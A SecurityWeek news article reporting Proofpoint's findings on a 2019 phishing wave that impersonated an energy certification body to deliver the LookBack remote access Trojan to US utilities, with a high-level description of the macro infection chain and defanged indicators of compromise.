Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

Additional U.S. Utilities Targeted With LookBack Malware

Proofpoint security researchers have observed a new series of phishing attacks targeting entities in the United States utilities sector in an attempt to deliver the LookBack remote access Trojan (RAT).

Proofpoint security researchers have observed a new series of phishing attacks targeting entities in the United States utilities sector in an attempt to deliver the LookBack remote access Trojan (RAT).

In early August, the security firm detailed a series of similar attacks on the U.S. utilities sector, where phishing emails would carry Word documents containing malicious macros that were designed to download and execute the LookBack Trojan.

Now, Proofpoint says a new wave of attacks was observed between August 21 and August 29, and that additional organizations in the utilities sector were targeted. The emails impersonated a licensing body related to the utilities sector, masquerading as Global Energy Certification (GEC).

The tactics, techniques, and procedures (TTPs) are consistent with previously reported activity. Attached Word documents were once again leveraged for malware delivery.

So far, the security researchers have identified at least 17 entities in the US utilities sector that have been targeted by these threat actors from April 5 through August 29, 2019.

The researchers also discovered that the attackers conducted reconnaissance scanning against future targets utilizing a staging IP. The scanning targeted SMB over IP via port 445 for up to two weeks prior to the sending of the phishing emails.

Originating from an email address at the domain globalenergycertification[.]net, which spoofs the official GEC website, the message invited recipients to take the GEC exam administered by the Energy Research and Intelligence Institution.

In addition to the malicious Word document, the emails also had a legitimate and benign PDF file attached. Designed for exam preparation, the PDF was hosted on the legitimate GEC site.

Advertisement. Scroll to continue reading.

The VBA macros in the Word document were similar to those observed in July. As soon as the user opens the attachment and enables it, the macro installs several privacy-enhanced mail (PEM) files on the host. These files are both malware modules and macro variables.

Additionally, the macro drops a version of certutil.exe on to the victim’s machine, and leverages it to decode the initial files. The PEM files are a GUP Proxy tool, a malicious loader, and a file containing command and control (C&C) configuration data.

The attackers modified the macros in the recent campaign, by adding some more variables that are referred to when the Word document is opened and macros are enabled. These variables, likely an attempt at obfuscation, are leveraged in the installation of the malicious loader. The C&C server used in this campaign was 103.253.41[.]45, the same as in the July attacks.

“The evolution of TTPs including updated macros demonstrates a further departure from tactics previously employed by known APT groups. However, at the current moment, the creators of LookBack malware are yet to depart from their persistent focus on critical infrastructure providers in the United States,” Proofpoint concludes.

Related: New “LookBack” Malware Used in Attacks Against U.S. Utilities Sector

Related: Hackers Behind ‘Triton’ Malware Target Electric Utilities in US, APAC

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Cyberwarfare

An engineer recruited by intelligence services reportedly used a water pump to deliver Stuxnet, which reportedly cost $1-2 billion to develop.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.